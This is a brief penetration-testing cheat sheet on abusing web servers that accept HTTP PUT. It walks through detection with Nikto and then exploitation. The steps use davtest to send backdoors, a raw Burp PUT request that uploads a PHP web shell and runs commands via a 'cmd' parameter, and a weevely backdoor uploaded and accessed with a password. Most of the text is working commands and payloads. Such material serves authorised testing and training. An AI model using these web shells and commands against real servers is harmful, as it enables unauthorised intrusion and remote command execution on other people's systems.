Abusing HTTP PUT

Detection of vulnerability

Run Nikto:

nikto --host <target ip>:<target port>

If it returns

+ OSVDB-397: HTTP method 'PUT' allows clients to save files on the web server.

You are potentially in business.

Some options for exploitation:

Try to get a backdoor with davtest

davtest -url http://<target ip>:target port> -sendbd auto -cleanup

This will test all possible payloads it has, send backdoors and clean up after itself afterwards.

Try a basic php backdoor with Burp

Capture a request, and send it to repeater. Change the method to PUT and add some php code to the bottom of the request. It should look roughly like this:

PUT /test.php HTTP/1.1
Host: <target ip>:<target port>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
If-Modified-Since: Fri, 17 Feb 2017 22:27:30 GMT
If-None-Match: "18518f6-5a9-548c16b5e72ae"
Cache-Control: max-age=0
Content-Length: 50

echo exec($_GET[cmd]);

Once this is up, navigate to the page and try to run commands like so:

http://<target ip>:<target port>/test.php?cmd=whoami

Create a backdoor with weevely and upload it with poster

Start by downloading the poster addon for firefox.

Next, spawn a backdoor with weevely:

weevely generate evil /root/back.php

This will output back.php with the password evil.

Go ahead and upload this shell using the PUT method with Poster by setting the following fields:

URL: http://<target ip>:<target port>/back.php
File: <location of back.php>

and then clicking the PUT button.

Now access the backdoor like so:

weevely http://<target ip>:<target port>/back.php evil


Once you're done, delete the backdoor using the DELETE method with Poster (specify DELETE in the dropdown and click the green button). Alternatively, since you'll probably have gotten a shell to the system at this point, you can rm it as well.